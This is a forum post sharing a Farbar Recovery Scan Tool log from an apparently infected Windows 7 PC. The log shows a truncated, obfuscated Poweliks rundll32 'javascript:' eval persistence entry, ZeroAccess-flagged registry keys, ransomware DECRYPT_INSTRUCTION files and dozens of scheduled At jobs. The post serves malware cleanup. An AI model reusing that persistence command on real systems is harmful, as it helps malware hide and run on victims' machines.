aagah

Here is my FRST.log

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-09-2014
Ran by smotamedy (administrator) on SMOTAMDEY on 27-09-2014 17:56:48
Running from F:\
Loaded Profile: smotamedy (Available profiles: admin & smotamedy)
Platform: Microsoft Windows 7 Professional (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
(Cisco WebEx LLC) C:\Windows\System32\atashost.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(Lenovo) C:\Program Files\ThinkPad\Utilities\PWMDBSVC.exe
() C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe
(Ulead Systems, Inc.) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
(LITEON) C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\skdh8821.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Intuit Inc.) C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(Microsoft Corp.) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\System Update\SUService.exe
(Lenovo Group Limited) C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

Winlogon\Notify\vvubjer: C:\Users\SMOTAM~1\AppData\Local\Temp\yhO0a9p3PC3iH3FRVaL\AppData\Local\vvubjer.dll [X]
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3883856 2009-07-26] (Microsoft Corporation)
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\Policies\Explorer: [Run] "C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\IEUpdate\esentutl.exe"
HKU\S-1-5-21-499009960-272174587-744029597-1146\...\MountPoints2: {cb82d864-b72f-11df-aa94-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-499009960-272174587-744029597-1146\...409d6c4515e9\InprocServer32: [Default-shell32] C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51\n. ATTENTION! ====> ZeroAccess?
HKU\S-1-5-21-499009960-272174587-744029597-1146\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil10n_ActiveX.exe -update activex
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)
Startup: C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esentutl.lnk
ShortcutTarget: esentutl.lnk -> C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\IEUpdate\esentutl.exe (No File)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkcentre
SearchScopes: HKCU - DefaultScope {CAB6444A-D968-40CC-8D3D-32F912B73043} URL =
SearchScopes: HKCU - {CAB6444A-D968-40CC-8D3D-32F912B73043} URL =
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll (Microsoft Corp.)
BHO: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
Toolbar: HKCU - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cab
Handler: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll ()
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

Chrome:
=======

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 atashost; C:\Windows\system32\atashost.exe [43912 2010-11-23] (Cisco WebEx LLC)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
S4 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-11-08] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2011-08-19] (Intuit Inc.) [File not signed]
S4 QBVSS; C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2011-08-19] (Intuit Inc.) [File not signed]
R2 Sks8821; C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe [125952 2010-05-04] () [File not signed]
R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)
R2 SUService; c:\Program Files\Lenovo\System Update\SUService.exe [28672 2010-03-15] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe [1474560 2009-09-03] (Lenovo Group Limited) [File not signed]
R2 UleadBurningHelper; C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [61440 2008-01-10] (Ulead Systems, Inc.) [File not signed]
S3 COMSysApp; %SystemRoot%\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 AcpiPmi; C:\Windows\system32\DRIVERS\acpipmi.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 aliide; C:\Windows\system32\DRIVERS\aliide.sys [40448 2009-07-13] (Acer Laboratories Inc.) [File not signed]
S3 amdide; C:\Windows\system32\DRIVERS\amdide.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 BrFiltLo; C:\Windows\system32\DRIVERS\BrFiltLo.sys [40448 2009-07-13] (Brother Industries, Ltd.) [File not signed]
S3 BrFiltUp; C:\Windows\system32\DRIVERS\BrFiltUp.sys [40448 2009-07-13] (Brother Industries, Ltd.) [File not signed]
S3 BrUsbMdm; C:\Windows\System32\Drivers\BrUsbMdm.sys [40448 2009-07-13] (Brother Industries Ltd.) [File not signed]
S3 BrUsbSer; C:\Windows\System32\Drivers\BrUsbSer.sys [40448 2009-07-13] (Brother Industries Ltd.) [File not signed]
S3 BthEnum; C:\Windows\System32\DRIVERS\BthEnum.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 circlass; C:\Windows\system32\DRIVERS\circlass.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 CmBatt; C:\Windows\system32\DRIVERS\CmBatt.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 cmdide; C:\Windows\system32\DRIVERS\cmdide.sys [40448 2009-07-13] (CMD Technology, Inc.) [File not signed]
S4 crcdisk; C:\Windows\system32\DRIVERS\crcdisk.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 ErrDev; C:\Windows\system32\DRIVERS\errdev.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()
S3 fdc; C:\Windows\system32\DRIVERS\fdc.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 flpydisk; C:\Windows\system32\DRIVERS\flpydisk.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir.sys [40448 2009-07-13] (Hauppauge Computer Works, Inc.) [File not signed]
S3 HidBatt; C:\Windows\system32\DRIVERS\HidBatt.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 HidIr; C:\Windows\system32\DRIVERS\hidir.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-09-27] (Malwarebytes Corporation)
S3 megasas; C:\Windows\system32\DRIVERS\megasas.sys [40448 2009-07-13] (LSI Corporation) [File not signed]
R0 vdorctrl; C:\Windows\System32\DRIVERS\vdorctrl.sys [44544 2009-07-13] () [File not signed]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-27 17:56 - 2014-09-27 17:56 - 00000000 ____D () C:\FRST
2014-09-27 16:48 - 2014-09-27 16:48 - 00002246 _____ () C:\Users\smotamedy\Desktop\SpyHunter.lnk
2014-09-27 16:48 - 2014-09-27 16:48 - 00000106 _____ () C:\spyhunter.fix
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\sh4ldr
2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-09-27 16:48 - 2013-10-18 15:01 - 00285747 _____ () C:\shldr
2014-09-27 16:48 - 2013-10-18 15:01 - 00008192 _____ () C:\shldr.mbr
2014-09-27 16:47 - 2014-09-27 16:48 - 00000000 ____D () C:\Windows\455F074C814E4520B69B5584BD90400C.TMP
2014-09-27 16:47 - 2014-09-27 16:47 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-09-27 14:39 - 2014-09-27 14:53 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-27 14:38 - 2014-09-27 14:49 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-27 14:38 - 2014-09-27 14:38 - 00001056 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-27 14:38 - 2014-09-27 14:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-27 14:38 - 2014-09-27 14:38 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-27 14:38 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-27 14:38 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-27 14:38 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-09-25 11:57 - 2014-09-25 11:31 - 00244136 _____ () C:\Users\smotamedy\Downloads\Firefox Setup Stub 32.0.3.exe
2014-09-08 11:41 - 2014-09-27 14:58 - 00017470 _____ () C:\Windows\PFRO.log
2014-09-08 10:16 - 2014-09-08 10:16 - 00000000 ____D () C:\Windows\system32\%SystemDrive%
2014-09-07 03:09 - 2014-09-26 13:09 - 00073512 _____ () C:\feeddl.dat
2014-09-07 02:57 - 2014-09-08 12:41 - 00054156 ____H () C:\Windows\QTFont.qfn
2014-09-07 02:57 - 2014-09-07 02:57 - 00001409 _____ () C:\Windows\QTFont.for
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\DECRYPT_INSTRUCTION.URL
2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\DECRYPT_INSTRUCTION.URL
2014-09-07 01:26 - 2014-09-07 01:26 - 00008174 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:26 - 2014-09-07 01:26 - 00008174 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:26 - 2014-09-07 01:26 - 00004132 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:26 - 2014-09-07 01:26 - 00004132 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:26 - 2014-09-07 01:26 - 00000254 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-09-07 01:26 - 2014-09-07 01:26 - 00000254 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.URL
2014-09-07 01:23 - 2014-09-07 01:23 - 00008174 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:23 - 2014-09-07 01:23 - 00004132 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:23 - 2014-09-07 01:23 - 00000254 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-07 01:21 - 2014-09-07 01:21 - 00008174 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:21 - 2014-09-07 01:21 - 00008174 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.HTML
2014-09-07 01:21 - 2014-09-07 01:21 - 00004132 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:21 - 2014-09-07 01:21 - 00004132 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.TXT
2014-09-07 01:21 - 2014-09-07 01:21 - 00000254 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL
2014-09-07 01:21 - 2014-09-07 01:21 - 00000254 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL
2014-09-07 01:05 - 2014-09-27 17:05 - 00000354 _____ () C:\Windows\Tasks\At84.job
2014-09-07 01:05 - 2014-09-27 17:05 - 00000352 _____ () C:\Windows\Tasks\At83.job
2014-09-07 01:05 - 2014-09-27 16:05 - 00000354 _____ () C:\Windows\Tasks\At82.job
2014-09-07 01:05 - 2014-09-27 16:05 - 00000352 _____ () C:\Windows\Tasks\At81.job
2014-09-07 01:05 - 2014-09-27 15:05 - 00000354 _____ () C:\Windows\Tasks\At80.job
2014-09-07 01:05 - 2014-09-27 15:05 - 00000352 _____ () C:\Windows\Tasks\At79.job
2014-09-07 01:05 - 2014-09-27 14:05 - 00000354 _____ () C:\Windows\Tasks\At78.job
2014-09-07 01:05 - 2014-09-27 14:05 - 00000352 _____ () C:\Windows\Tasks\At77.job
2014-09-07 01:05 - 2014-09-27 13:05 - 00000354 _____ () C:\Windows\Tasks\At76.job
2014-09-07 01:05 - 2014-09-27 13:05 - 00000352 _____ () C:\Windows\Tasks\At75.job
2014-09-07 01:05 - 2014-09-25 23:05 - 00000354 _____ () C:\Windows\Tasks\At96.job
2014-09-07 01:05 - 2014-09-25 23:05 - 00000352 _____ () C:\Windows\Tasks\At95.job
2014-09-07 01:05 - 2014-09-25 22:09 - 00000352 _____ () C:\Windows\Tasks\At93.job
2014-09-07 01:05 - 2014-09-25 22:05 - 00000354 _____ () C:\Windows\Tasks\At94.job
2014-09-07 01:05 - 2014-09-25 21:05 - 00000354 _____ () C:\Windows\Tasks\At92.job
2014-09-07 01:05 - 2014-09-25 21:05 - 00000352 _____ () C:\Windows\Tasks\At91.job
2014-09-07 01:05 - 2014-09-25 20:06 - 00000352 _____ () C:\Windows\Tasks\At89.job
2014-09-07 01:05 - 2014-09-25 20:05 - 00000354 _____ () C:\Windows\Tasks\At90.job
2014-09-07 01:05 - 2014-09-24 19:06 - 00000352 _____ () C:\Windows\Tasks\At87.job
2014-09-07 01:05 - 2014-09-24 19:05 - 00000354 _____ () C:\Windows\Tasks\At88.job
2014-09-07 01:05 - 2014-09-24 18:05 - 00000354 _____ () C:\Windows\Tasks\At86.job
2014-09-07 01:05 - 2014-09-24 18:05 - 00000352 _____ () C:\Windows\Tasks\At85.job
2014-09-07 01:04 - 2014-09-26 12:08 - 00000352 _____ () C:\Windows\Tasks\At73.job
2014-09-07 01:04 - 2014-09-26 12:05 - 00000354 _____ () C:\Windows\Tasks\At74.job
2014-09-07 01:04 - 2014-09-26 11:05 - 00000354 _____ () C:\Windows\Tasks\At72.job
2014-09-07 01:04 - 2014-09-26 11:05 - 00000352 _____ () C:\Windows\Tasks\At71.job
2014-09-07 01:04 - 2014-09-26 10:07 - 00000352 _____ () C:\Windows\Tasks\At69.job
2014-09-07 01:04 - 2014-09-26 10:05 - 00000354 _____ () C:\Windows\Tasks\At70.job
2014-09-07 01:04 - 2014-09-26 09:05 - 00000354 _____ () C:\Windows\Tasks\At68.job
2014-09-07 01:04 - 2014-09-26 09:05 - 00000352 _____ () C:\Windows\Tasks\At67.job
2014-09-07 01:04 - 2014-09-26 08:06 - 00000352 _____ () C:\Windows\Tasks\At65.job
2014-09-07 01:04 - 2014-09-26 08:05 - 00000354 _____ () C:\Windows\Tasks\At66.job
2014-09-07 01:04 - 2014-09-26 07:07 - 00000352 _____ () C:\Windows\Tasks\At63.job
2014-09-07 01:04 - 2014-09-26 07:05 - 00000354 _____ () C:\Windows\Tasks\At64.job
2014-09-07 01:04 - 2014-09-26 06:05 - 00000354 _____ () C:\Windows\Tasks\At62.job
2014-09-07 01:04 - 2014-09-26 06:05 - 00000352 _____ () C:\Windows\Tasks\At61.job
2014-09-07 01:04 - 2014-09-26 05:05 - 00000354 _____ () C:\Windows\Tasks\At60.job
2014-09-07 01:04 - 2014-09-26 05:05 - 00000352 _____ () C:\Windows\Tasks\At59.job
2014-09-07 01:04 - 2014-09-26 04:05 - 00000354 _____ () C:\Windows\Tasks\At58.job
2014-09-07 01:04 - 2014-09-26 04:05 - 00000352 _____ () C:\Windows\Tasks\At57.job
2014-09-07 01:04 - 2014-09-26 03:05 - 00000354 _____ () C:\Windows\Tasks\At56.job
2014-09-07 01:04 - 2014-09-26 03:05 - 00000352 _____ () C:\Windows\Tasks\At55.job
2014-09-07 01:04 - 2014-09-26 02:05 - 00000354 _____ () C:\Windows\Tasks\At54.job
2014-09-07 01:04 - 2014-09-26 02:05 - 00000352 _____ () C:\Windows\Tasks\At53.job
2014-09-07 01:04 - 2014-09-26 01:05 - 00000354 _____ () C:\Windows\Tasks\At52.job
2014-09-07 01:04 - 2014-09-26 01:05 - 00000352 _____ () C:\Windows\Tasks\At51.job
2014-09-07 01:04 - 2014-09-26 00:05 - 00000354 _____ () C:\Windows\Tasks\At50.job
2014-09-07 01:04 - 2014-09-26 00:05 - 00000352 _____ () C:\Windows\Tasks\At49.job
2014-09-07 00:45 - 2014-09-08 20:53 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Awesdoop
2014-09-07 00:44 - 2014-09-08 22:34 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Zovoheap
2014-09-07 00:42 - 2014-09-27 14:49 - 00000000 ____D () C:\ProgramData\AfufGasor
2014-09-07 00:24 - 2014-09-27 13:05 - 00000112 _____ () C:\ProgramData\bw5EWA37M.dat
2014-09-07 00:23 - 2014-09-27 17:05 - 00000348 _____ () C:\Windows\Tasks\At36.job
2014-09-07 00:23 - 2014-09-27 17:05 - 00000346 _____ () C:\Windows\Tasks\At35.job
2014-09-07 00:23 - 2014-09-25 23:05 - 00000348 _____ () C:\Windows\Tasks\At48.job
2014-09-07 00:23 - 2014-09-25 23:05 - 00000346 _____ () C:\Windows\Tasks\At47.job
2014-09-07 00:23 - 2014-09-25 22:05 - 00000348 _____ () C:\Windows\Tasks\At46.job
2014-09-07 00:23 - 2014-09-25 22:05 - 00000346 _____ () C:\Windows\Tasks\At45.job
2014-09-07 00:23 - 2014-09-25 21:05 - 00000348 _____ () C:\Windows\Tasks\At44.job
2014-09-07 00:23 - 2014-09-25 21:05 - 00000346 _____ () C:\Windows\Tasks\At43.job
2014-09-07 00:23 - 2014-09-25 20:09 - 00000346 _____ () C:\Windows\Tasks\At41.job
2014-09-07 00:23 - 2014-09-25 20:05 - 00000348 _____ () C:\Windows\Tasks\At42.job
2014-09-07 00:23 - 2014-09-24 19:05 - 00000348 _____ () C:\Windows\Tasks\At40.job
2014-09-07 00:23 - 2014-09-24 19:05 - 00000346 _____ () C:\Windows\Tasks\At39.job
2014-09-07 00:23 - 2014-09-24 18:06 - 00000346 _____ () C:\Windows\Tasks\At37.job
2014-09-07 00:23 - 2014-09-24 18:05 - 00000348 _____ () C:\Windows\Tasks\At38.job
2014-09-07 00:22 - 2014-09-27 16:49 - 00000346 _____ () C:\Windows\Tasks\At33.job
2014-09-07 00:22 - 2014-09-27 16:05 - 00000348 _____ () C:\Windows\Tasks\At34.job
2014-09-07 00:22 - 2014-09-27 15:05 - 00000348 _____ () C:\Windows\Tasks\At32.job
2014-09-07 00:22 - 2014-09-27 15:05 - 00000346 _____ () C:\Windows\Tasks\At31.job
2014-09-07 00:22 - 2014-09-27 14:49 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ymyqbyg
2014-09-07 00:22 - 2014-09-27 14:05 - 00000348 _____ () C:\Windows\Tasks\At30.job
2014-09-07 00:22 - 2014-09-27 14:05 - 00000346 _____ () C:\Windows\Tasks\At29.job
2014-09-07 00:22 - 2014-09-27 13:05 - 00000348 _____ () C:\Windows\Tasks\At28.job
2014-09-07 00:22 - 2014-09-27 13:05 - 00000346 _____ () C:\Windows\Tasks\At27.job
2014-09-07 00:22 - 2014-09-26 12:06 - 00000346 _____ () C:\Windows\Tasks\At25.job
2014-09-07 00:22 - 2014-09-26 12:05 - 00000348 _____ () C:\Windows\Tasks\At26.job
2014-09-07 00:22 - 2014-09-26 11:07 - 00000346 _____ () C:\Windows\Tasks\At23.job
2014-09-07 00:22 - 2014-09-26 11:05 - 00000348 _____ () C:\Windows\Tasks\At24.job
2014-09-07 00:22 - 2014-09-26 10:05 - 00000348 _____ () C:\Windows\Tasks\At22.job
2014-09-07 00:22 - 2014-09-26 10:05 - 00000346 _____ () C:\Windows\Tasks\At21.job
2014-09-07 00:22 - 2014-09-26 09:05 - 00000348 _____ () C:\Windows\Tasks\At20.job
2014-09-07 00:22 - 2014-09-26 09:05 - 00000346 _____ () C:\Windows\Tasks\At19.job
2014-09-07 00:22 - 2014-09-26 08:08 - 00000346 _____ () C:\Windows\Tasks\At17.job
2014-09-07 00:22 - 2014-09-26 08:05 - 00000348 _____ () C:\Windows\Tasks\At18.job
2014-09-07 00:22 - 2014-09-26 07:05 - 00000348 _____ () C:\Windows\Tasks\At16.job
2014-09-07 00:22 - 2014-09-26 07:05 - 00000346 _____ () C:\Windows\Tasks\At15.job
2014-09-07 00:21 - 2014-09-26 06:05 - 00000348 _____ () C:\Windows\Tasks\At14.job
2014-09-07 00:21 - 2014-09-26 06:05 - 00000346 _____ () C:\Windows\Tasks\At13.job
2014-09-07 00:21 - 2014-09-26 05:05 - 00000348 _____ () C:\Windows\Tasks\At12.job
2014-09-07 00:21 - 2014-09-26 05:05 - 00000346 _____ () C:\Windows\Tasks\At11.job
2014-09-07 00:21 - 2014-09-26 04:05 - 00000348 _____ () C:\Windows\Tasks\At10.job
2014-09-07 00:21 - 2014-09-26 04:05 - 00000346 _____ () C:\Windows\Tasks\At9.job
2014-09-07 00:21 - 2014-09-26 03:06 - 00000346 _____ () C:\Windows\Tasks\At7.job
2014-09-07 00:21 - 2014-09-26 03:05 - 00000348 _____ () C:\Windows\Tasks\At8.job
2014-09-07 00:21 - 2014-09-26 02:05 - 00000348 _____ () C:\Windows\Tasks\At6.job
2014-09-07 00:21 - 2014-09-26 02:05 - 00000346 _____ () C:\Windows\Tasks\At5.job
